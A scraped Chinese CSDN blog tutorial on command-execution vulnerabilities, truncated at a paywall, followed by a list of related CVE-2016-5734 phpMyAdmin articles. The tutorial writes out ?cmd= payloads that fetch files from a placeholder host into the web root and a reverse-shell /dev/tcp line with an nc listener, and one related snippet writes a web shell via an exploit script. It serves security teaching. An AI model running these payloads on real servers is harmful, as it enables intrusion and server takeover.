命令执行漏洞和CVE-2016-5734分析

最新推荐文章于 2024-05-31 14:43:12 发布
最新推荐文章于 2024-05-31 14:43:12 发布
阅读量873 收藏 1
点赞数
分类专栏: web安全学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34640691/article/details/109133383
版权
命令执行漏洞背景程序员使用脚本语言(比如PHP)开发应用程序过程中,脚本语言开发十分快速、简洁,方便,但是也伴随着一-些问题。比如说速度慢,或者无法接触系统底层,如果我们开发的应用,特别是企业级的一些应用需要去调用一-些外部程序。当应用需要调用- - -些外部程序时就会用到一-些执行系统命令的函数。命令执行漏洞原理命令执行漏洞(Command Execution)是指应用有时需要调用一些执行系统命令的函数,如: system()、 exec()、shell exec()、 eval()、 pass
摘要由CSDN通过智能技术生成

命令执行漏洞

  • 背景
    程序员使用脚本语言(比如PHP)开发应用程序过程中,脚本语言开发十分快速、简洁,方便,但是也伴随着一-些问题。比如说速度慢,或者无法接触系统底层,如果我们开发的应用,特别是企业级的一些应用需要去调用一-些外部程序。当应用需要调用- - -些外部程序时就会用到一-些执行系统命令的函数。
  • 命令执行漏洞原理
    命令执行漏洞(Command Execution)是指应用有时需要调用一些执行系统命令的函数,如: system()、 exec()、shell exec()、 eval()、 passthru(), 代码未对用户可控参数做过滤,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击。


    在这里插入图片描述

漏洞分类

  1. 1.代码层过滤不严
    商业应用的一些核心代码封装在二进制文件中,在Web应用中通过system函数来调用:system(" /bin/program --arg $arg’ ) ;
  2. 系统的漏洞造成命令注入
    bash破壳漏洞(CVE- -2014- -6271)
  3. 调用的第三方组件存在代码执行漏洞
    WordPress中用来处理图片的ImageMagick组件;
    JAVA中的命令执行漏洞(struts2/ElasticsearchQroovy等) ;
    ThinkPHP命令执行;

漏洞危害

  • 继承Web服务器程序的权限,去执行系统命令

  • 继承Web服务器程序的权限,读写文件

  • 反弹shell

  • 控制整个网站

  • 甚至控制整个服务器

如果有写权限的话,执行pwd或者dir得到绝对路径
写文件:
●?cmd=echo" <?php phpinfo0?>" > /var/www/html/info.php.
●?cmd=wget -O /var/www/html/info.php http://www.xx.com/phpinfo.txt
●?cmd=curI http://www.xx.com/phpinfo.txt > /var/www/htm/info.php.
反弹shell
公网服务器执行nc -lvv 8888

目标服务器上执行
?cmd= bash T >& 7dev/tcp/21.x.x.x78888 0>&1

DVWA的四种级别分析

low:

最低0.47元/天 解锁文章
kongytr
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2016-5734 Phpmyadmin后台代码执行漏洞复现
凝聚力安全团队
01-24 2244
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞利用漏洞加固参考链接 漏洞描述   CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的 4.6.x 版本(直至 4.6.3),4.4.x 版本(直至 4.4.15.7),和 4.0.x 版本(直至 4.0.10.16)。 CVE的作者利用在php 5
CVE-2016-5734 phpmyadmin 远程命令执行漏洞
qq_41567985的博客
09-27 423
CVE-2016-5734在exploit-db上也就是phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的4.6.x版本(直至4.6.3),4.4.x版本(直至4.4.15.7),和4.0.x版本(直至4.0.10.16)。CVE的作者利用在php5.4.7之前的版本中preg_replace函数对空字节的错误处理Bug,使注入的代码可远程执行
CVE-2016-5734 phpmyadmin 远程代码执行漏洞
最新发布
xuxuxuxxxxx的博客
05-31 336
phpMyAdmin 是一个用PHP编写的软件工具,可以通过web方式控制和操作MySQL数据库。通过phpMyAdmin 可以完全对数据库进行操作,例如建立、复制和删除数据等等。phpMyAdmin在其查找并替换字符串功能中,将用户输入的信息拼接进 preg_replace 函数第一个参数中。在PHP5.4.7以前,preg_replace 的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞
buuctf [PHPMYADMIN]CVE-2016-5734
qq_1873822的博客
03-19 588
漏洞简介 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第一个参数中。 在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞。 以下版本受到影响: 4.0.10.16之前4.0.x版本 4.4.15.7之前4.4.x版本 4.6.3之前4.6.x版本(实际上由于该版本要求PHP5.5+,
phpmyadmin CVE-2016-5734
weixin_51692662的博客
11-03 240
phpmyadmin CVE-2016-5734
phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞CVE-2016-5734
黑白的博客
12-29 593
声明 好好学习,天天向上 漏洞描述 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第一个参数中。 在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞。 影响范围 4.0.10.16之前4.0.x版本 4.4.15.7之前4.4.x版本 4.6.3之前4.6.x版本(实际上由于该版本要
apache stucts 2远程命令执行漏洞 (CVE-2021-31805) poc检测工具
04-21
检测一个url命令为 python3 CVE-2022-22954-POC.py -u http://test.com 检测多个url命令为 python3 CVE-2022-22954-POC.py -f file.txt(把url按一行一个保存到file.txt中) 结果有可能如下
DirtyCow提权漏洞复现(CVE-2016-5195)1
08-08
脏牛(Dirty Cow)漏洞,全称为“竞争条件写入时复制”(Copy-on-Write Race Condition),在2016年被发现,其安全漏洞编号为CVE-2016-5195。这个漏洞主要影响的是Linux内核,特别是从2007年的2.6.22版本到修复前的...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
OpenSSH 存在输入验证错误漏洞(CVE-2019-16905)修复补丁及命令
01-15
在2019年,OpenSSH被发现存在一个名为CVE-2019-16905的输入验证错误漏洞。这个漏洞允许攻击者通过精心构造的公钥文件,可能导致服务崩溃或者可能执行任意代码,对系统安全构成严重威胁。为了保护系统免受此漏洞的...
CVE-2020-24581 D-Link DSL-2888A 远程命令执行漏洞分析1
08-03
**文章标题:**深入解析CVE-2020-24581:D-Link DSL-2888A远程命令执行漏洞 **文章正文:** D-Link DSL-2888A是一款由D-Link公司制造的统一服务路由器,它在AU_2.31_V1.1.47ae55之前的版本中存在一个严重的安全...
【phpmyadmin漏洞复现】CVE-2016-5734远程代码执行漏洞+CVE-2018-12613文件包含漏洞+WooYun-2016-199433反序列化漏洞
serendipity1130的博客
09-01 870
CVE-2016-5734 1.访问8080端口,用弱口令root root登录 2. 在Kali中有自带的EXP: searchsploit phpmyadmin 3.进入该目录:/usr/share/exploitdb/exploits/php/webapps,通过EXP写入一句话木马: python3 40185.py -u root --pwd="root" http://192.168.225.139:8080/ -c "file_put_contents('shell.php'
CentOS 6.8普通账户SSH登录提示符异常解决
bigwood99的博客
09-22 742
现象: 使用root创建新账户,用户shell是/bin/bash,同步创建家目录。 登录成功,但是提示符异常。 正常的提示符格式应为:用户名@主机名 路径$ 实际显示:~bash版本号$ 过程: 网上搜索,很多文章说可以通过在家目录下".bashrc"和".bash_profile"文件,编写相关代码来解决。 这两个文件是用户登录后,系统自动搜索,搜索到其中之一后会执行它。 按此方法测试,发现无效。基本可以确定,系统没有去执行这两个文件任意一个。 切换shell,使用usermod.
PhpMyAdmin远程执行代码漏洞复现 (CVE-2016-5734
千寻的博客
03-21 1449
phpMyAdmin`中存在安全漏洞,该漏洞源于程序没有正确选择分隔符来避免使用`preg_replace e`修饰符。远程攻击者可借助特制的字符串利用该漏洞执行任意PHP代码。
CVE-2016-5734)phpmyadmin反序列化漏洞复现
weixin_45540609的博客
09-08 461
一、漏洞简介 在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞。 二、漏洞原理 https://www.jianshu.com/p/8e44cb1b5b5b 三、漏洞利用 https://blog.csdn.net/weixin_52777165/article/details/112251253 vulhub搭建环境 访问 poc如下: https:/..
阿里云Linux服务器漏洞修复记录2020/09/24
u010148324的博客
09-24 1413
CVE-2017-7895 Linux kernel NFSv2和NFSv3服务器安全绕过漏洞 yum update kernel yum update kernel-devel yum update kernel-firmware yum update kernel-headers CVE-2017-11176 9.8 Linux kernel 'mq_notify'内存错误引用漏洞 CVE-2017-7542 5.5 Linux kernel 'ip6_find_1stfragopt'函数本地拒绝服务
vulhub-phpmyadmin中CVE-2016-5734
qq_26947429的博客
07-23 570
CVE-2016-5734远程代码执行漏洞 影响版的本phpmyadmin4.3.0-4.6.2 看到phpmyadmin登陆页面爆破拿到用户名密码root,root 利用poc进行命令执行 写入一句话进行菜刀连接 python27 CVE-2016-5734.py -u root -p "root" http://xx.xx.xx.xx:8080 -c "file_put_contents('shell.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY21kX
CVE-2016-5734远程代码执行模拟从外网进入内网
大方子
08-29 2039
【自己直接从自己的笔记中复制来的,若出现排版问题请直接查看原笔记】 文档:CVE-2016-5734远程代码执行模拟从外网?.. 链接:http://note.youdao.com/noteshare?id=fbf75e67cc1573d01982bd923ac6c179&sub=8FB1C4FA3A1A4A45BD694D18C59391B8 前言 最近学习各种漏洞,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值